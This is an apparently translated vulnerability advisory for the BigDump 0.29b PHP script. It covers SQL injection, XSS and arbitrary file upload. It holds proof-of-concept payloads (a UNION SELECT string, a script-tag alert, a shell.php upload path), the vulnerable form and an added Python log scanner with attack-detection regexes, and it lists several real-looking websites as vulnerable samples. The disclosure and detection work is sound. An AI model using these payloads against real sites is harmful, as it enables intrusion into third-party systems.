Release date:
Updated on: 2012-4 4
Affected Systems:
Ozerov BigDump 0.29b
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56744
BigDump is a tool script developed by the German Alexey Ozerov in PHP to import mysql Data in batches.
BigDump 0.29b, 0.32b, and other versions contain cross-site scripting, SQL injection, and arbitrary file upload vulnerabilities. Attackers can exploit them to steal cookie-based authentication credentials, upload arbitrary files, access or modify data, and exploit other weaknesses in the underlying database.
Source: Ur0b0r0x
Link: http://packetstormsecurity.org/files/118463/bigdump032b-shellxsssql.txt
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
http://www.example.com/bigdump.php?start=[SQL]
http://www.example.com/bigdump.php?start=[XSS]
http://www.example.com/bigdump.php [File Upload]
# Expl0it/P0c ###################
http://site.com/bigdump.php?start=<SQL Vulnerability Path>
http://site.com/bigdump.php?start=<XSS Vulnerability Path>
http://site.com/bigdump.php <Arbitrary Upload Path>
# Expl0it/P0c/upload ###############
Input:  $ch = curl_init("http://site.com/bigdump.php?start=shell.php");
Output: $ch = curl_init("http://site.com/bigdump/uploads/shell.php");
# Expl0it/P0c/SQL ###################
+union+select+1,2,4,5,6,7,8,9,10--+
# Expl0it/P0c/Xss ###################
"><script>alert(String.fromCharCode(88,83,83))</script>
# Vulnerability/C0de /###################
<!-- Upload form from bigdump.php: the uploaded "dumpfile" is written to the upload directory without any extension or content check -->
<form method="POST" action="<?php echo ($_SERVER["PHP_SELF"]); ?>?action=step3" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="$upload_max_filesize">
<p>Dump file: <input type="file" name="dumpfile" accept="*/*" size="60"></p>
<p><input type="submit" name="uploadbutton" value="Upload"></p>
</form>
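From the defender's side, the three request shapes described in the PoC above (a non-numeric `start` value carrying SQL or script markup, a multipart POST to `?action=step3`, and a subsequent request for a `.php` file under the upload directory) are all visible in ordinary web-server access logs. The following Python script is an added example, not part of the original advisory or of BigDump's own code; it classifies constructed Apache combined-log lines against those shapes. The log lines, IP addresses, timestamps and the `/bigdump/uploads/` path are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic): one benign
# session, one session that walks through the SQLi / XSS / upload PoC.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2012:10:01:02 +0000] "GET /bigdump.php?start=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2012:10:01:09 +0000] "GET /bigdump.php?start=1+union+select+1,2,4,5,6,7,8,9,10--+ HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2012:10:01:15 +0000] "GET /bigdump.php?start=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E HTTP/1.1" 200 5400 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Dec/2012:10:01:20 +0000] "POST /bigdump.php?action=step3 HTTP/1.1" 200 2100 "-" "curl/7.26.0"
203.0.113.5 - - [04/Dec/2012:10:01:25 +0000] "GET /bigdump/uploads/shell.php HTTP/1.1" 200 134 "-" "curl/7.26.0"
198.51.100.7 - - [04/Dec/2012:10:02:00 +0000] "GET /bigdump.php?start=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Coarse markers; the decisive signal for BigDump is that "start" is not a number.
SQLI_RE = re.compile(r'\b(union\s+(all\s+)?select|sleep\s*\(|benchmark\s*\()', re.I)
XSS_RE = re.compile(r'(<\s*script|javascript:|on\w+\s*=)', re.I)

# Executable extensions that should never be served from the dump upload directory.
SCRIPT_EXTS = ('.php', '.phtml', '.php3', '.php5', '.phar')


def classify(line):
    """Return {'ip', 'target', 'findings'} for a parsable line, else None.

    'findings' is empty for traffic that matches none of the PoC shapes.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group('target')
    parts = urlsplit(target)
    path = parts.path.lower()
    findings = []

    if path.endswith('bigdump.php'):
        # parse_qs percent-decodes values and turns '+' into spaces for us.
        qs = parse_qs(parts.query, keep_blank_values=True)
        for value in qs.get('start', []):
            if value.isdigit():
                continue                      # legitimate use: a numeric line offset
            if SQLI_RE.search(value):
                findings.append('sqli-start')
            elif XSS_RE.search(value):
                findings.append('xss-start')
            else:
                findings.append('non-numeric-start')
        # Any upload is worth an audit event; correlate it with what follows.
        if m.group('method') == 'POST' and qs.get('action') == ['step3']:
            findings.append('upload-step3')
    elif '/uploads/' in path and path.endswith(SCRIPT_EXTS):
        # A 200 here means the server executed (or served) a script from the
        # dump directory: the post-upload stage of the PoC.
        if m.group('status') == '200':
            findings.append('script-exec-in-uploads')

    return {'ip': m.group('ip'), 'target': target, 'findings': findings}


def scan(log_text):
    """Return the records with at least one finding, in log order."""
    return [rec for rec in map(classify, log_text.splitlines())
            if rec and rec['findings']]


def summarize(alerts):
    """Collapse alerts to {client_ip: set(finding_names)} for triage."""
    by_ip = {}
    for a in alerts:
        by_ip.setdefault(a['ip'], set()).update(a['findings'])
    return by_ip


if __name__ == '__main__':
    for rec in scan(SAMPLE_LOG):
        print(rec['ip'], ', '.join(rec['findings']), rec['target'])
    print(summarize(scan(SAMPLE_LOG)))
```

Run against the embedded sample, the script flags the four PoC-shaped requests from 203.0.113.5 and leaves the two numeric `start` requests alone. The `non-numeric-start` bucket is deliberately kept separate from the pattern matches: a WAF-evading payload will miss the regexes, but it still cannot be a valid BigDump offset, so that bucket is the one to review first.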
# Samples/Arbitrary_Upload/SQL/Xss ####################
http://www.fs7a.net/vb/1/bigdump.php
http://www.lis186.com/dump/bigdump.php
http://bigw3.com/bigdump.php
http://twin.skr.jp/bigdump/bigdump.php
http://www.fs7a.net/vb/1/bigdump.php?start=%
http://www.lis186.com/dump/bigdump.php?start=%
http://bigw3.com/bigdump.php?start=%
http://twin.skr.jp/bigdump/bigdump.php?start=%
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Ozerov
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users of the software watch the vendor's homepage and obtain the latest version from there:
http://www.ozerov.de/bigdump/